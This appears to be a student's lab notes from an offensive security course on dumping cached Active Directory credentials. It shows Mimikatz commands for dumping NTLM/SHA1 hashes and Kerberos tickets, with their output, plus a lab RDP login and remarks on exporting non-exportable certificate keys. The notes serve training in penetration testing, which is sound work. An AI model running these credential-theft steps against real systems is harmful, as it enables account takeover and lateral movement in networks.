Topics: Cached AD Credentials

Questions
Follow the steps outlined in this section to retrieve the cached NTLM hash. Furthermore, execute the dir command and list the cached tickets. What is the Mimikatz command to dump hashes for all users logged on to the current system?
sekurlsa::logonpasswords

# Access to client 75 Windows OS
xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.240.75

# Open Powershell in administrator
PS C:\Tools> .\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK

# Now we can run sekurlsa::logonpasswords to dump the credentials of all logged-on users with the sekurlsa module
mimikatz # sekurlsa::logonpasswords
...
         * Username : dave
         * Domain   : CORP
         * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
         * SHA1     : a0c2285bfad20cc614e2d361d6246579843557cd

         * Username : jeff
         * Domain   : CORP
         * NTLM     : 2688c6d2af5e9c7ddb268899123744ea
         * SHA1     : f57d987a25f39a2887d158e8d5ac41bc8971352f
...

# We can observe two types of hashes highlighted in the output above. This will vary based on the functional level of the AD implementation.
# For instances running Windows Server 2008 or later, both NTLM and SHA-1. On older operating systems like Windows 7, or operating systems that have it manually set, WDigest11 will be enabled. When WDigest is enabled, running Mimikatz will reveal cleartext passwords alongside the password hashes.

# Armed with these hashes, we could attempt to crack them and obtain the cleartext password as we did in Password Attacks.

# A different approach and use of Mimikatz is to exploit Kerberos authentication by abusing TGT and service tickets. As already discussed, we know that Kerberos TGT and service tickets for users currently logged on to the local machine are stored for future use. These tickets are also stored in LSASS, and we can use Mimikatz to interact with and retrieve our own tickets as well as the tickets of other local users.

# Let's open a second PowerShell window ahnd list the contents of the SMB sare on WEB04 with UNC path \\web04.corp.com\backup. This will create and cache a service ticket.

PS C:\Users\jeff> dir \\web04.corp.com\backup

# Once we had executed the directory listing on SMB share, we can use mimikatz to show the tickets that are stored in memory by entering sekurlsa::tickets

mimikatz # sekurlsa::tickets
...
        Group 0 - Ticket Granting Service
           Service Name (02) : cifs ; web04.corp.com ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM
        Group 2 - Ticket Granting Ticket
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
...

# Above results show both a TGT and TGS. Stealing a TGS would allow us to access only particular resources associated with those tickets. Alternatively, armed with a TGT, we could request a TGS for specific resources we want to target within the domain. We will discuss how to leverage stolen or forged tickets later on in this and the next Module.

# Mimikatz can also export tickets to the hard drive and import tickets into LSASS, which we will explore later.

#  Microsoft provides the AD role Active Directory Certificate Services (AD CS)13 to implement a PKI, which exchanges digital certificates between authenticated users and trusted resources.

# If a server is installed as a Certification Authority (CA),14 it can issue and revoke digital certificates (and much more). While a deep discussion on these concepts would require its own Module, let's focus on one aspect of cached and stored objects related to AD CS.

# For example, we could issue certificates for web servers to use HTTPS or to authenticate users based on certificates from the CA via Smart Cards.15

# These certificates may be marked as having a non-exportable private key16 for security reasons. If so, a private key associated with a certificate cannot be exported even with administrative privileges. However, there are various methods to export the certificate with the private key.

# We can rely again on Mimikatz to accomplish this. The crypto17 module contains the capability to either patch the CryptoAPI18 function with crypto::capi19 or KeyIso20 service with crypto::cng,21 making non-exportable keys exportable.

